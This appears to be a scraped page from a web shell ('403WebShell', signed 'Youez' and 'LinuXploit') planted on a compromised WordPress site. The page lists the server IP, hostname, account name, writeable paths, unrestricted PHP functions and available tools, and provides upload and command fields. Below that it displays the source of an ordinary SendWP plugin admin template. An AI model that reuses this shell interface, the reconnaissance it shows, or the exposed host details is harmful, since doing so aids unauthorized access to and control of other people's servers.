Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.23.103.203
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/tacafoundation.org/wp-content/plugins/sendwp/includes/admin/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/tacafoundation.org/wp-content/plugins/sendwp/includes/admin/views/menu.html.php
<?php
$connected = sendwp_client_connected();
$forwarding = sendwp_forwarding_enabled();
?>

<div class="sendwp-page">

	<img src="<?php echo \SendWP\Assets::image_url('logo-render.png'); ?>" alt="SendWP" class="logo" />

	<?php if(!$connected) { ?>
	<div id="sendwp-connect">
		<p><?php _e('Your site is currently not connected to sendwp.com.', 'sendwp'); ?></p>
		<form method="POST" action="<?php echo sendwp_get_server_url(); ?>_/signup">
			<input type="hidden" name="client_name" value="<?php echo sendwp_get_client_name(); ?>">
			<input type="hidden" name="client_url" value="<?php echo sendwp_get_client_url(); ?>">
			<input type="hidden" name="client_redirect" value="<?php echo sendwp_get_client_redirect(); ?>">
			<input type="hidden" name="client_secret" value="<?php echo sendwp_get_client_secret(); ?>">
			<input type="hidden" name="partner_id" value="<?php echo sendwp_get_client_partner_id(); ?>">
			<button type="submit" class="button button-primary">
				<?php _e('Connect to SendWP', 'sendwp'); ?>
			</button>
		</form>
	</div>
	<?php } else { ?>
	<div id="sendwp-enabled">
		<label class="switch" id="sendwp-enabled-button">
			<input type="checkbox" id="sendwp-enabled-checkbox" <?php print $forwarding ? 'checked' : ''; ?> />
			<span class="slider round"></span>
		</label>
		<span id="sendwp-enabled-status"><?php print $forwarding ? $vars['enabled'] : $vars['disabled']; ?></span>
	</div>
	<?php } ?>
	<hr />

	<p>
		<strong>Questions?</strong> Get help at <a
			href="https://sendwp.com/support?utm_source=sendwp&utm_medium=plugin&utm_campaign=support-help&utm_content=questions-cta">https://sendwp.com/support</a>
	</p>

	<!-- spoiler -->
	<div id="spoiler-block">
		<span id="spoiler-title">Debug Info<span id="spoiler-arrow" class="down"></span></span>
		<div id="spoiler-content" class="closed">
			<ul>
				<li>Server URL: <?php echo sendwp_get_server_url(); ?></li>
				<li>Client Name: <?php echo sendwp_get_client_name(); ?></li>
				<li>Client URL: <?php echo sendwp_get_client_url(); ?></li>
				<li>Client Redirect: <?php echo sendwp_get_client_redirect(); ?></li>
				<li>Client Secret: <?php echo sendwp_get_client_secret(); ?></li>
				<li>Authorization Hash: <?php echo sendwp_generate_hash() ?> </li>
				<li>Connection Status: <?php print $connected ? 'Connected' : 'Not Connected'; ?></li>
				<li>Forwarding Status: <?php print $forwarding ? 'Enabled' : 'Disabled'; ?></li>
				<li>Last Check In: <?php echo sendwp_last_pulse(); ?></li>
				<li>Last Result: <?php echo sendwp_last_pulse_result(); ?></li>
			</ul>
		</div>
	</div>

	<form action="<?php echo admin_url('admin-post.php'); ?>" method="post">
		<input type="hidden" name="action" value="sendwp_reset_plugin_data">
		<?php wp_nonce_field('reset_sendwp_data' . sendwp_get_client_secret()); ?>

		<input class="button button-link" style="margin: 8px 0 0;" type="submit" value="Reset Security Hash">
	</form>

	<a class="button button-link" href="<?php echo esc_url( add_query_arg( [ 'grant-access' => 1 ] ) ); ?>">Grant
		Support Access</a>

</div>
<!-- end of main content -->

Youez - 2016 - github.com/yon3zu
LinuXploit